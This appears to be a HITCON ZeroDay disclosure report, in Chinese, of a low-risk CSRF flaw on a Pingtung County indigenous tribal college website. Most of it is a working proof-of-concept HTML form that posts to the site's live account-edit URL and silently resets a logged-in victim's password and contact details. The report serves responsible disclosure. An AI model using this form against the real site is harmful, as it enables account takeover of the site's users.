屏東縣原住民族部落大學 CSRF - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2019-00587
  •  發信 Vendor: 屏東縣原住民族部落大學
  • Title: 屏東縣原住民族部落大學 CSRF
  • Introduction: Cross-Site Request Forgery

處理狀態

目前狀態

公開
Last Update : 2019/08/22
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2019/06/22 10:27:38 : 新提交 (由 Noth 更新此狀態)
  • 2019/06/23 11:44:49 : 新提交 (由 Noth 更新此狀態)
  • 2019/06/23 22:14:19 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/07/01 00:18:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/07/01 00:18:54 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2019/08/22 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2019-00587
  • 通報者:Cake7528064 (Noth)
  • 風險:低
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://pingtung.tbc.apc.gov.tw/user/?mode=edit

敘述

未驗證來自請求的 "域" 是否合法,也沒設置相關token令牌
PoC:
<form action="https://pingtung.tbc.apc.gov.tw/user/?mode=edit" id="frm_user" name="frm_user" method="post" onsubmit="return form_check(frm_user)" enctype="multipart/form-data">
<tr>
<td> <font color="#990000">「*」欄位的資料為必填。</font>
<input type="hidden" name="mode" value="update" /></td>
</tr>
<tr>
<td id="register_title"><h1>帳號設定</h1></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0" class="account_table">
<tr>
<th>帳號 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td> test123 </td>
</tr>
<tr>
<th>密碼 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input type="password" name="password" size="30" value="test123456" />
(限 5~20 個英文字母或數字)</td>
</tr>
<tr>
<th>密碼確認 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input type="password" name="confirm_pwd" size="30" value="test123456" />
(請再輸入一次密碼)</td>
</tr>
</table></td>
</tr>
<tr>
<td id="register_title"><h1>通訊資料</h1></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0" class="regester_table">
<tr>
<th>姓名 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td> test </td>
</tr>
<tr>
<th>性別 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td>男</td>
</tr>
<tr>
<th>族別
<img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" />
</th>
<td><select name='tribe' class='form_select'><option value=''>請選擇</option><option value='阿美族'>阿美族</option><option value='泰雅族'>泰雅族</option><option value='排灣族'>排灣族</option><option value='布農族'>布農族</option><option value='卑南族'>卑南族</option><option value='魯凱族'>魯凱族</option><option value='鄒族'>鄒族</option><option value='賽夏族'>賽夏族</option><option value='雅美族(達悟族)'>雅美族(達悟族)</option><option value='邵族'>邵族</option><option value='噶瑪蘭族'>噶瑪蘭族</option><option value='太魯閣族'>太魯閣族</option><option value='撒奇萊雅族'>撒奇萊雅族</option><option value='賽德克族'>賽德克族</option><option value='拉阿魯哇族'>拉阿魯哇族</option><option value='卡那卡那富族'>卡那卡那富族</option><option value='漢族'>漢族</option><option value='西拉雅族'>西拉雅族</option></select></td>
</tr>
<tr>
<th>E-mail <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input name="email" type="text" id="email" value="[email protected]" size="63" maxlength="255" /></td>
</tr>
<input type="hidden" name="area" maxlength="255" size="63" value="" />
<input type="hidden" name="zone" maxlength="255" size="63" value="中正區" />
<input type="hidden" name="zip" maxlength="255" size="63" value="" />
<input type="hidden" name="address" maxlength="255" size="63" value="" />
<tr>
<th>聯絡電話 <img src="https://imw8.5.238.ibiz.tw/user/image/marker.png" alt="必填欄位" title="必填欄位" /></th>
<td><input type="text" name="tel_1" maxlength="50" size="63" value="0903470190" /></td>
</tr>
<input type="hidden" name="byear" value="--" />
<input type="hidden" name="bmonth" value="" />
<input type="hidden" name="bday" value="" />
<input type="hidden" name="educational_background" value="" />
<input type="hidden" name="school" value="" />
<input type="hidden" name="career" value="" />
<input type="hidden" name="professional_title" value="" />
<input type="hidden" name="epaper_subscriber" value="0" />
<input type="hidden" name="file_list" value="" />
</table></td>
</tr>
<tr>
<td align="center"><input id="btn_submit" class="form_bottom" type="submit" name="btn_submit" value="確定 / 送出"></td>
</tr>
</form>

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;